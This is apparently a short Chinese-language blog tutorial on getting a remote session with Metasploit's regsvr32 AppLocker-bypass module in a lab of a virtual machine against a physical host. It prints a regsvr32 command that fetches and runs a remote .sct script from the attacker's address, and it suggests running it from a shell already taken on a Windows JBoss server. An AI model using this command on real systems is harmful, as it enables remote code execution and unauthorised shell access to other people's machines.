Metasploit對Rundll32的

參考利用文章鏈接:http://www.freebuf.com/articles/terminal/135391.html

    http://www.4hou.com/technology/5737.html

Rundll32的利用是通過對註冊動手腳,建立一個會話鏈接W7以上都存在,但是現在殺毒軟件都監控,實驗的時候關閉目標機的

殺毒軟件(如:360)

通過虛擬機打物理機,下圖可以看見同一網段而且是互相可以通訊的

啓動Metasploit


加載漏洞利用模塊:use exploit/windows/misc/regsvr32_applocker_bypass_server 



查看需要哪些參數:show options 


配置參數運行


得到一個 regsvr32 /s /n /u /i:http://192.168.117.155:8080/S2hYxUgEgmEK9.sct scrobj.dll


結合jeboss抓的服務器如果是Windows的,在獲得的shell 的CMD命令下執行


在回到kail 發現反彈了一個session ,執行session就開啓了一個CMD



結合一些windows的命令執行參考鏈接: http://www.sohu.com/a/199732200_99907709 





發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章